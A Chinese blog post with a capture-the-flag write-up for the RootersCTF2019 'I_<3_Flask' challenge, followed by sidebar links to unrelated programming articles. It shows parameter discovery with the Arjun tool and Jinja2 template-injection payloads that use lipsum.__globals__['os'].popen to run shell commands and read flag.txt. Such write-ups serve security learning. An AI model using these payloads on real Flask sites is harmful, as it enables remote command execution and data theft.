当前位置:网站首页>[RootersCTF2019]I_<3_Flask
[RootersCTF2019]I_<3_Flask
2022-07-26 22:39:00 【茶经新读.】
[RootersCTF2019]I_<3_Flask
一道比较简单的ssti题目,难点在于寻找注入的参数
发现了flask框架,寻找一下flask路由,f12没有发现什么东西,这里需要用到一个工具是Arjun,可以爆破我们所需要的参数:
下载:GitHub - s0md3v/Arjun: HTTP parameter discovery suite.
pip3 install arjun
python3 setup.py install
输入arjun -h查看版本,出现如下页面则安装成功:
arjun -u http://xxxxxxx.node4.buuoj.cn:81/ -c 100 -d 5
接下来直接利用flask的一个方法:lipsum
可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{ {lipsum.__globals__['os'].popen('ls').read()}}
然后构建payload:/?name={ {lipsum.__globals__['os'].popen('ls').read()}}
发现了flag.txt,直接用cat命令:
payload:/?name={ {lipsum.__globals__['os'].popen('cat flag.txt').read()}}
边栏推荐
- DOM day_ 03 (7.11) event bubbling mechanism, event delegation, to-do items, block default events, mouse coordinates, page scrolling events, create DOM elements, DOM encapsulation operations
- [Qt]元对象系统
- [qt] container class, iterator, foreach keyword
- Apply with new, delete and malloc, free to free the heap space
- [interview: concurrent Article 16: multithreading: detailed explanation of wait/notify] principle and wrong usage (false wake-up, etc.)
- DOM day_02(7.8)网页制作流程、图片src属性、轮播图、自定义属性、标签栏、输入框事件、勾选操作、访问器语法
- Resolve Microsoft 365 and Visio conflicts
- 6_ Gradient descent method
- 关于Thymeleaf的表达式
- 【4.6 中国剩余定理详解】
猜你喜欢
Configure deeplobcut2 with your head covered
7_ Principal component analysis
放图仓库-2(函数图像)
DOM day_ 04 (7.12) BOM, open new page (delayed opening), address bar operation, browser information reading, historical operation
Shufflenet series (2): explanation of shufflenet V2 theory
Matlab simulation of image reconstruction using filtered back projection method
【AcWing第61场周赛】
The detailed process of reinstalling AutoCAD after uninstallation and deleting the registry
Arcgis和Cass实现断面展高程点
Comparative simulation of LEACH protocol performance, including the number of dead nodes, data transmission, network energy consumption, the number of cluster heads and load balance
随机推荐
C语言 关机小程序
DOM day_ 02 (7.8) web page production process, picture SRC attribute, carousel chart, custom attribute, tab bar, input box event, check operation, accessor syntax
继承,继承,继承
The use of C language static can flexibly change the life cycle and make you write code like a duck to water
【4.1 质数及线性筛】
【4.7 高斯消元详解】
程序员必做50题
【4.3 欧拉函数详解】
Huffman encoding and decoding
八皇后 N皇后
[4.10 detailed explanation of game theory]
ArcGIS and CASS realize elevation points of cross-section Exhibition
JSCORE day_04(7.5)
Mysql常用函数(汇总)
Find method of web page parsing by crawler
Use of postman
【4.10 博弈论详解】
ES6中的export和import
postman的使用
Point to plane projection